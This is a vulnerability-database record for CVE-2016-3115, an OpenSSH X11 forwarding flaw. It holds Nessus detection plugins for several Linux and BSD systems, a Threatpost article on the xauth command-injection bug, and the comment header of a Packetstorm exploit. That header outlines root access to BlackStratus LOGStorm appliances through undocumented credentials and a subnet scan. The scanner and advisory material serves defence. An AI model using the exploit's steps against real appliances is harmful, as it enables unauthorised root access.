Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"openssh-portable<7.2.p2,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-02-01T01:21:14", "description": "It was discovered that the OpenSSH server did not sanitize data\nreceived in requests to enable X11 forwarding. 
An authenticated client\nwith restricted SSH access could possibly use this flaw to bypass\nintended restrictions.", "edition": 25, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-17T00:00:00", "title": "Amazon Linux AMI : openssh (ALAS-2016-668)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:openssh-clients", "p-cpe:/a:amazon:linux:pam_ssh_agent_auth", "p-cpe:/a:amazon:linux:openssh-ldap", "p-cpe:/a:amazon:linux:openssh-debuginfo", "p-cpe:/a:amazon:linux:openssh-server", "p-cpe:/a:amazon:linux:openssh", "p-cpe:/a:amazon:linux:openssh-keycat", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-668.NASL", "href": "https://www.tenable.com/plugins/nessus/89965", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-668.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89965);\n script_version(\"2.5\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"ALAS\", value:\"2016-668\");\n\n script_name(english:\"Amazon Linux AMI : openssh (ALAS-2016-668)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the OpenSSH server did not sanitize data\nreceived in requests to enable X11 forwarding. 
An authenticated client\nwith restricted SSH access could possibly use this flaw to bypass\nintended restrictions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-668.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update openssh' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"openssh-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssh-clients-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssh-debuginfo-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssh-keycat-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssh-ldap-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssh-server-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"pam_ssh_agent_auth-0.9.3-9.23.60.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-clients / openssh-debuginfo / openssh-keycat / etc\");\n}\n", "cvss": {"score": 5.5, 
"vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:14:44", "description": "This update provides recent upstream (security) release, sanitizing\nX11 authentication credentials.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-14T00:00:00", "title": "Fedora 23 : openssh-7.2p2-1.fc23 (2016-bb59db3c86)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssh", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-BB59DB3C86.NASL", "href": "https://www.tenable.com/plugins/nessus/89887", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-bb59db3c86.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89887);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FEDORA\", value:\"2016-bb59db3c86\");\n\n script_name(english:\"Fedora 23 : openssh-7.2p2-1.fc23 (2016-bb59db3c86)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update provides recent upstream (security) release, sanitizing\nX11 authentication credentials.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the 
Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1316829\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178838.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9cba1a66\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"openssh-7.2p2-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-06T13:23:45", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2016-3115: missing sanitisation of input for X11\n forwarding (#1317817)\n\n - Restore functionallity of pam_ssh_agent_auth in FIPS\n mode (#1278315)\n\n - Initialize devices_done variable for challenge response\n (#1281468)\n\n - Update behaviour of X11 forwarding to match 
upstream\n (#1299048)\n\n - Ammends previous release, fixing typos and behaviour\n changes", "edition": 28, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-05-16T00:00:00", "title": "OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0048)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-05-16T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:openssh-clients", "p-cpe:/a:oracle:vm:openssh", "p-cpe:/a:oracle:vm:openssh-server"], "id": "ORACLEVM_OVMSA-2016-0048.NASL", "href": "https://www.tenable.com/plugins/nessus/91153", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0048.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91153);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3115\");\n\n script_name(english:\"OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0048)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2016-3115: missing sanitisation of input for X11\n forwarding (#1317817)\n\n - Restore functionallity of pam_ssh_agent_auth in FIPS\n mode (#1278315)\n\n - Initialize devices_done variable for challenge response\n (#1281468)\n\n - Update behaviour of X11 forwarding to match upstream\n (#1299048)\n\n - Ammends previous release, fixing typos and behaviour\n changes\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2016-May/000462.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2016-May/000461.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected openssh / openssh-clients / openssh-server\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-5.3p1-117.el6\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-clients-5.3p1-117.el6\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-server-5.3p1-117.el6\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-5.3p1-117.el6\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-clients-5.3p1-117.el6\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-server-5.3p1-117.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-clients / openssh-server\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, 
{"lastseen": "2021-01-12T10:14:01", "description": "Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-04-27T00:00:00", "title": "Fedora 23 : gsi-openssh-7.2p2-1.fc23 (2016-188267b485)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-04-27T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gsi-openssh", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-188267B485.NASL", "href": "https://www.tenable.com/plugins/nessus/90726", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-188267b485.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90726);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FEDORA\", value:\"2016-188267b485\");\n\n script_name(english:\"Fedora 23 : gsi-openssh-7.2p2-1.fc23 (2016-188267b485)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1318201\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183122.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?795cacc8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gsi-openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gsi-openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"gsi-openssh-7.2p2-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gsi-openssh\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:38", "bulletinFamily": "info", "cvelist": ["CVE-2016-3115"], "description": "Users who choose to enable X11Forwarding in OpenSSH, or those who use software products that re-enable it, should pay close attention to last Wednesday\u2019s OpenSSH security update.\n\nThe latest version of the open source implementation of the SSH protocol patches a flaw that exposes it to command 
injection attacks. The open source project cautions that OpenSSH disabled X11Forwarding long ago\u2014it is no longer the default configuration\u2014thus limiting the risk to most users. But some vendors\u2014OpenSSH singled out Red Hat in particular\u2014turn X11Forwarding on and those versions prior to 7.2p2 with X11Forwarding enabled are at risk.\n\n\u201cRed Hat enables X11Forwarding on the server side by default, but disables it on the client side by default,\u201d Red Hat said in a statement provided to Threatpost. \u201cClients should only enable it when they trust the server they are connecting to.\u201d\n\nRed Hat said it rated the vulnerability, CVE-2016-3115, [\u201cmoderate\u201d severity](<https://access.redhat.com/security/cve/CVE-2016-3115>).\n\n\u201cA few vendors\u2014Red Hat in particular\u2014re-enabled the feature in their own redistribution of OpenSSH in their products, against our advice,\u201d said OpenBSD founder and OpenSSH project leader Theo de Raadt. \u201cWe try to ship with safe defaults. They instead shipped with unsafe defaults.\u201d\n\nAn [advisory](<http://www.openssh.com/txt/x11fwd.adv>) published last Wednesday by OpenSSH explains that untrusted inputs are not properly sanitized allowing an authenticated user who is able to request X11Forwarding to inject commands to xauth. An attacker could abuse this to read files as a privileged user, or use other xauth commands to leak information, overwrite files, probe ports and more.\n\nFrom the OpenSSH advisory:\n\n> \u201cAs part of establishing an X11 forwarding session, sshd accepts an X11 authentication credential from the client. This credential is supplied to the xauth utility to establish it for X11 applications that the user subsequently runs. The contents of the credential\u2019s components (authentication scheme and credential data) were not sanitized to exclude meta-characters such as newlines. An attacker could therefore supply a credential that injected commands to xauth. 
The attacker could then use a number of xauth commands to read or overwrite arbitrary files subject to file permissions, connect to local ports or perform attacks on xauth itself.\u201d\n\nDe Raadt said that X11Forwarding should be enabled only on a case-by-case basis.\n\n\u201cOpenSSH serves many purposes: interactive logins, forwarding features, and tunnel features used in a more automated fashion,\u201d de Raadt said. \u201cAfter that time, we added some additional features to make automated services (git/rsync/etc,\u2026) services more restricted, a variety of lockdown features. It is a similar idea\u2014that people use the lockdown features on the accounts/services where they need it.\n\n\u201cWith this new bug the two parts have collided,\u201d de Raadt said. \u201cIf X11Forwarding is \nenabled, the lockdown features can be bypassed.\u201d\n\nDe Raadt said that OpenSSH has been, for two years, disabling older, insecure crypto implementations.\n\n\u201cWe are deprecating everything we can, to avoid a \u2018Heartbleed\u2019 scenario in OpenSSH,\u201d de Raadt said. 
\u201cA few specific vendors are taking our new code, and immediately re-enabling insecure algorithms, and we believe they are simply unqualified to make those decisions.\u201d\n", "modified": "2016-03-15T20:06:09", "published": "2016-03-15T16:06:09", "id": "THREATPOST:F895E4C708DB124636408645530A739D", "href": "https://threatpost.com/openssh-implementations-with-x11forwarding-enabled-should-heed-recent-security-update/116801/", "type": "threatpost", "title": "OpenSSH Implementations with X11Forwarding Enabled Should Heed Recent Security Update", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:27", "description": "", "published": "2016-12-05T00:00:00", "type": "packetstorm", "title": "BlackStratus LOGStorm 4.5.1.35 / 4.5.1.96 Remote Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-12-05T00:00:00", "id": "PACKETSTORM:140019", "href": "https://packetstormsecurity.com/files/140019/BlackStratus-LOGStorm-4.5.1.35-4.5.1.96-Remote-Root.html", "sourceData": "`#!/usr/bin/python \n# logstorm-root.py \n# \n# BlackStratus LOGStorm Remote Root Exploit \n# \n# Jeremy Brown [jbrown3264/gmail] \n# Dec 2016 \n# \n# -Synopsis- \n# \n# \"Better Security and Compliance for Any Size Business\" \n# \n# BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among \n# other things, to assume complete control over the virtual appliance with root privileges. This is \n# possible due to multiple network servers listening for network connections by default, allowing \n# authorization with undocumented credentials supported by appliance's OS, web interface and sql server. \n# \n# -Tested- \n# \n# v4.5.1.35 \n# v4.5.1.96 \n# \n# -Usage- \n# \n# Dependencies: pip install paramiko MySQL-python \n# \n# There are (5) actions provided in this script: root, reset, sql, web and scan. 
\n# \n# [root] utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command \n# [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password \n# [sql*] utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials \n# [web] utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account \n# [scan] scans a given <host>/24 for potentially vulnerable appliances \n# \n# *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only. \n# \n# Note: this exploit is not and cannot be weaponized simply because exploits are not weapons. \n# \n# -Fixes- \n# \n# BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But \n# customers may (now) root the appliance themselves to change the passwords, disable root login, firewall \n# network services or remove additional user accounts to mitigate these vulnerabilities.. or choose another \n# product altogether because this appliance, as of today, simply adds too much attack surface to the network. 